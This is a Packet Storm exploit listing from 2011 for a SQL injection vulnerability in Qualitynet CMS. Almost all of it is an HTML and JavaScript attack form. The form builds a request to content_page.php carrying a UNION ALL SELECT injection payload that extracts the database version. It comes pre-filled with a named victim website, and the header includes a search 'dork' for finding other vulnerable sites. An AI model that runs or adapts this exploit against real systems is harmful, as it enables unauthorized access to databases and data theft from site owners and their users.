Qualitynet CMS SQL Injection

🗓️ 14 Mar 2011 00:00:00Reported by ItSecTeamType

packetstorm🔗 packetstormsecurity.com👁 19 Views

Qualitynet CMS SQL Injection vulnerability in injectcode paramete

`<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">  
<title>ITSecTeam</title>  
<script language="JavaScript">  
//=========================================================================  
//( #Title : qualitynet cms SQL Injection Vulnerability exploit  
//( #Vendor: http://www.qualitynet.co.il  
//=========================================================================  
//( #Author : ItSecTeam  
//( #Email : [email protected]  
//( #Website: http://www.itsecteam.com  
//( #Forum : http://forum.ITSecTeam.com  
//( #dork : http://www.qualitynet.co.il/content_page_18.html  
//---------------------------------------------------------------------  
  
function it(){  
xpl.action=  
xpl.victim.value+xpl.path.value+xpl.file.value+xpl.injectcode.value;xpl.submit();  
  
}  
</script>  
  
</head>  
  
<body bgcolor="#FFFFFF">  
  
<p align="left"><font color="#0000FF">qualitynet cms injection  
Vulnerability</font></p>  
<p align="left"><font  
color="#0000FF">-----------------------------------</font></p>  
<form method="post" name="xpl" onSubmit="it();">  
<p align="left">  
<font size="2" face="Tahoma"> victim: <input type="text" name="victim"  
size="33";" style="color: #FFFFFF; background-color: #000000"  
value="http://www.printmaking.co.il"> path: <input type="text"  
name="path" size="20";" style="color: #FFFFFF; background-color:  
#000000" value="/">  
file: <input type="text" name="file" size="20";" style="color: #FFFFFF;  
background-color: #000000" value="content_page.php"> </font>  
</p>  
<p align="left">  
<font size="2" face="Tahoma"> injectcode: <input type="text"  
name="injectcode" size="115";" style="color: #FFFFFF;  
background-color: #000000" value="?id=1 UNION ALL SELECT  
0,1,2,concat(0x3a,(select @@version)),4,5,6,7,8--">  
</p>  
</p>  
<center>  
  
</p>  
<p><input type="submit" value="GO(inject)" name="B1" style="float:  
left"><input type="reset" value="reset" name="B2" style="float:  
left"></p>  
</form>  
<p><br>  
</p>  
</center>  
<font  
color="#0000FF">------------------------------------------</font></body></body>  
  
</html>  
  
  
`

14 Mar 2011 00:00Current

0.1Low risk

Vulners AI Score0.1